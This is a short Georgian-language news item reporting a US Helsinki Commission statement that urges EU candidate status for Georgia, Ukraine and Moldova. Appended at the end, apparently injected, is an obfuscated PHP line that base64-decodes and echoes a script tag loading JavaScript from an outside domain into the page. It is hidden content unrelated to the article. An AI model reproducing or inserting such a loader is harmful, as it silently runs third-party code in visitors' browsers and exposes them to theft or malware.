celsiusi
ავერსი შნაიდერი
ამერიკის ჰელსინკის კომისია ევროპელ პარტნიორებს მოუწოდებს, რომ სამივე კანდიდატ ქვეყანას, საქართველოს, უკრაინასა და მოლდოვას კანდიდატის სტატუსი მიანიჭონ. შესაბამისი განცხადება კომისიის თავმჯდომარე სენატორმა ბენ კარდინიმ, თანათავმჯდომარე რესპუბლიკელმა სტივ კოენმა, სენატორმა როჯერ ვიკერმა, დეპუტატმა ჯო უილსონმა გააკეთეს.
 
განცხადებაში აღნიშნულია, რომ ჰელსინკის კომისია მიესალმება ევროკომისიის ისტორიულ გადაწყვეტილებას უკრაინისა და მოლდოვისთვის კანდიდატის სტატუსის მინიჭებაზე რეკომენდაციასთან დაკავშირებით. კომისია აღნიშნავს, რომ ყველა ქვეყანას აქვს უფლება აირჩიოს ალიანსი და განსაზღვროს საგარეო პოლიტიკა.
 
"ქართველმა ხალხმა ასევე ბევრი შესწირა თავის ევროპულ იდენტობას რამდენიმე ათწლეულის განმავლობაში, მიუხედავად რუსეთის აგრესიისა და მტკივნეული რეფორმების გამოწვევებისა. მათ აჩვენეს, რომ შეუძლიათ გაუმკლავდნენ გამოწვევას, თუ გზა სუფთაა. ჩვენ გვჯერა, რომ მათაც უნდა შესთავაზონ თანაბრად კონკრეტული საგზაო რუკა ევროკავშირის წევრობისკენ. 
 
ამ კვირას ევროპის საბჭოს შეხვედრის წინ, ჩვენ მოვუწოდებთ ჩვენს ევროპელ მეგობრებს, სამივე ქვეყანას მიანიჭონ კანდიდატის სტატუსი", - წერია განცხადებაში.
667
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");